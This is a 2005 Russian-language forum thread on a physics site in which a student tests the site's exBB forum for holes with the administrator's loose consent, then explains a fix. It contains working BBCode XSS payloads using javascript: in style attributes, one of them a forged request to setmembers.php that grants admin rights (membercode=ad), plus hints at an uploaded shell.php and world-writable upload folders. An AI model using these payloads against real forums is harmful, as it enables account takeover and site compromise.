Если занимательно и интересно, может быть поможете и примете участие в работе форума, я бы и так отдал Вам все права
Ваш опыт и знание в программировании были бы для нас неоценимы И так работы по горло, вот сейчас получил заказ на взлом подобного форума - сорри, но ваш первый попался на глаза, вот я его и кавыряю
ООЧЕНЬ большая просьба - зайди на свой ФТП и посмотри плиз - нет ли в папке /forum/uploads/ файла shell.php
att-435387d90c9574.gif
index.html
Если будут еще вопросы отвечу позже.
А сейчас убегаю, остаетесь за полного хозяина
Как с Вами связаться? На почту мне адресок не кинете?Кстати, вопрос, может, подскажете, как в XP избавиться от выскакивающего сообщения, что компьютер инфицирован spyware. Вчера подхватил каких-то троянов и червей, вроде их убрал Ad-Ware, но сообщение все равно выскакивает.
(Добавление)
Ещё вопрос - какие прова у вас стоят на папку /uploads/ и на папку /im/avatars/personal/ ?!
Связаться со мной - ICQ 492365
(Добавление)
Ладно, с вас хватит... складывю свои полномочия и передаю обратно... пойду следующий поищи, какой-то у вас не стандартный форум то
Просьба ответить на вопрос который стоит выше!
P.S. надеюсь не много намусорил - убраться смогёте?!
P.S.S А физика мне пригодиться
Я в 11 классе учусь, буду к админу лезть тепер за помощью!Всё, удачи всем!
На папку /uploads/ стоят права 777, а на /im/avatars/personal/ 775
Спасибо
Можно в личку, или на почтовый ящик.Для начала права на каталоги проверьте.
http://forum.alfaspace.net/index.php?action=vthread&forum=1&topic=825
(Добавление)
Похоже форумы exBB очень большая дыра. Сюдя по найденой инфе. Я тут побалуюсь немного для саморазвития. Ок?
Проверю уязвимости.sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_hacker/))`
СИД, хоть у меня и не получилось, тут несколько советов по заплаткам. http://krsuhelp.to.kg/forums/index.php?s=096a3070a0c8d01e9bf90e4c48c787f0&showtopic=377
Если не сложно, можете показать исходные текты сообщений:
http://physmag.h1.ru/forum/topic.php?forum=10&topic=1&start=1#1129547737
http://physmag.h1.ru/forum/topic.php?forum=10&topic=1&start=1#1129549299
http://physmag.h1.ru/forum/topic.php?forum=2&topic=21&start=1#1128516456
ЗЫ. Я еще попытаюсь. :)
(Отредактировано автором: 18 Октября, 2005 - 12:37:46)
[color='Z=]'style='background:url(javascript:document.images[0].src="http://physmag.h1.ru/forum/setmembers.php? action=edit_user&checkaction=yes&userid=93 &membertitle=&emailaddress=lol@lol.ru&newname=Next&password= &homepage=&aolname=&icqnumber=&location=&interests=&signature= &numberofposts=0&avatar=noavatar.gif&membercode=ad &submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'[/color]
(Отредактировано автором: 18 Октября, 2005 - 14:53:42)
Цитата:
| Похоже форумы exBB очень большая дыра. Сюдя по найденой инфе. Я тут побалуюсь немного для саморазвития. Ок? Проверю уязвимости. |
ОК! Дело нужное
Цитата:
| Если не сложно, можете показать исходные текты сообщений: http://physmag.h1.ru/forum/topic.php?forum=10&topic=1&start=1#1129547737 http://physmag.h1.ru/forum/topic.php?forum=10&topic=1&start=1#1129549299 http://physmag.h1.ru/forum/topic.php?forum=2&topic=21&start=1#1128516456 |
В первых двух файлах ничего нет кроме строчки
htrhtrhtrhtr
В последнем обычное сообщение с картинкой (судя по IP это другой Гость
):Код:
| Здравствуйте, кто-нить знает, что это за сивол: [img]http://goodboard.ru/uploads/astrostream/post-10-1128505270.jpg[/img] |
На Holm-е, где стоит сайт и форум, вообще довольно жесткие требования и свои установки на запуск файлов из директорий. Мне самому не удается часть файлов запустить на выполнение, например, я не могу развернуть поиск по форуму, хотя на другом бесплатном хостинге это делал без проблем.
Цитата:
| В первых двух файлах ничего нет кроме строчки |
Как то парень туда вставил картинки и видео.
Большинство описаных дыр у меня не сработало.
Может чего то не та делаю, а может и прикрыты. [color=#39]fffff[/color]' style=background:url(javascript:alert());
(Отредактировано автором: 18 Октября, 2005 - 16:54:29)
Вот еще описание свеженайденых уязвимостей:
http://pro-hack.ru/articles/bug/exbbv1.9.1.txt
(Отредактировано автором: 18 Октября, 2005 - 17:41:39)
похоже, на форуме появился троян, не могу заходить, мои жучки реагируют сразу. в смысле доктор Веб
Скорее всего, проблемы на Вашем компьютере. Попробуйте скачать программу Ad-Aware http://www.adaware.ru/download.htm и проверьте свой компьютер.
спасибо, сын это делает регулярно)
Короче форум ExBB не использует БД, вот в этом и его проблема, а также ему побарабану каким методом получать запрос - GET или POST, чем я и воспользовался, то есть я написал скрипт(закачал на свой хост и вставил в форум тэгом [IMG]), чтобы у всех просмотревших моё сообщение на форуме без их ведома выполнялась ССЫЛКА, которая меняет мои привилегии на админские, когда админ форума (С.И. Доронин) посмотрел это, тогда я и стал админом... Ссылка используеться стандартная(первоночальная), то есть если админ не копал *.php файлы форума и не менял некоторые значения, то эта ссылка работает... То есть как такого решения этой проблемы нет, только по той причине, что этот форум не использует БД
... Зато есть решение которое мы назовём "хитрое"...Ищем в файле "setmembers.php" такую строчку
Код:
| $dataout = '<select name="membercode"><option value="me">'.$lang['User'].'<option value="banned">'.$lang['Banned_user'].'<option value="ad">'.$lang['Admin'].'</select>'; |
и видим вот это : .'<option value="ad">'.$lang['Admin']
То есть используя ссылку по каторой я делаю себя админом идёт примерно следующий запрос : membercode=ad
А изминив "ad" на любое другое значение (н.п. qwe) уже эта ссылка не сработает, да и взломщик врятле догадаеться что дело в этом
Вот и всё, если что - kirjuha2003@hotmail.com
С тебя домашка по физики :P